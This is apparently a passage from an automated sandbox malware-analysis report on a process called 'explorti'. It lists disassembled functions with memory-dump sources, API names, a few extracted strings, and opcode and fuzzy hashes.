                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: f62d5ab99332d98a8b09509c97b1020668fad429690269b5673e330cf9f634f7
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: EC11087BA0014147FE048AADD9F46B6A796EAC73B1B3C437AD0424B758DA22D947F902
                        Function 00F8645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 59567200ebd2b7f9e344924961774f176884c87e38ce2acf20fbfffeab3cc738
                        • Instruction ID: cd259d2515b4fc1c2ab70302affb9c2cb0da5d036bf65a39e5f568b06b563f80
                        • Opcode Fuzzy Hash: 59567200ebd2b7f9e344924961774f176884c87e38ce2acf20fbfffeab3cc738
                        • Instruction Fuzzy Hash: C5E08C30240B086FDF39BF14DC68D9C3B5AEB52354F104800FC0486222CB6AED91EB81
                        Function 00F8A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction ID: 5ea9494c326aff467b32ba7d0f5b6a3c81fe01b01cba7f91048dbb986646c3ab
                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction Fuzzy Hash: 18E04632A11628EBCB15EB88890898AF2ACEB48B10F154096B501D3240C274DF00DBD0
                        Function 00F62E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
                        • API String ID: 0-3273830296
                        • Opcode ID: d712a2269bcc559997332269f275ba441513fb43cc1177de95c8134fdd8520bc
                        • Instruction ID: 97a1bf115ca5b8cf425fb08fe0a8272d6d3d95ab0e857401bbbc4bc40eccf39f
                        • Opcode Fuzzy Hash: d712a2269bcc559997332269f275ba441513fb43cc1177de95c8134fdd8520bc
                        • Instruction Fuzzy Hash: E202B270E00248EFEF14EFA8CC59BDEBBB5AF05314F544158E805A7282D7799A44DBA2
                        Function 00F870C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcsrchr
                        • String ID: .bat$.cmd$.com$.exe
                        • API String ID: 1752292252-4019086052
                        • Opcode ID: 00379fa1f1e5af1180aa72b61c3f0aecb283b9521767f84457a0b3e8a8346187
                        • Instruction ID: 73e7aae21a21fd08f859faa67df5d83158c4e4ba699bccb75ecaf97f33195285
                        • Opcode Fuzzy Hash: 00379fa1f1e5af1180aa72b61c3f0aecb283b9521767f84457a0b3e8a8346187
                        • Instruction Fuzzy Hash: 6401C827B18B16266618741D9C427BB27989B83BB4735002AF944F77C1DE88DC427391
                        Function 00F52E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_unlock$Cnd_broadcast
                        • String ID:
                        • API String ID: 32384418-0
                        • Opcode ID: 5c01dd5fc61310c882e2b0fbf8832305921df14969b979468e355dd4edcf8804
                        • Instruction ID: 7d885e7802b4c6df6c750bc1806ca82ff11cd3cc9b0490958282ada172294b71
                        • Opcode Fuzzy Hash: 5c01dd5fc61310c882e2b0fbf8832305921df14969b979468e355dd4edcf8804
                        • Instruction Fuzzy Hash: 73A1F071E007059FDB11DB68CD4476AB7E8BF06369F044229E946D7282EB34EA08EBD1
                        Function 00F8C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction ID: cc5867fdf026f2bf2bb8427c3e0718343d6106db57cca92af0f08f8802f75451
                        • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction Fuzzy Hash: 43B13632D006859FDB15EF28C851BFEBBE5EF96350F1481AAE845DB241D6388D41EBB0
                        Function 00F6BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xtime_diff_to_millis2_xtime_get
                        • String ID:
                        • API String ID: 531285432-0
                        • Opcode ID: b91840e6a0aabf8d261c6d7a0865cd7207f118dbb55e203507ff1dbc520e45a8
                        • Instruction ID: 7af07d28c7b44d9018ab06723456e0ad33433af8abe250bba9b5faf63e3e24d5
                        • Opcode Fuzzy Hash: b91840e6a0aabf8d261c6d7a0865cd7207f118dbb55e203507ff1dbc520e45a8
                        • Instruction Fuzzy Hash: 32216271E01219AFDF10EFA4DC859BEBBB8EF48710F000065F541A7251DB35AD41ABE1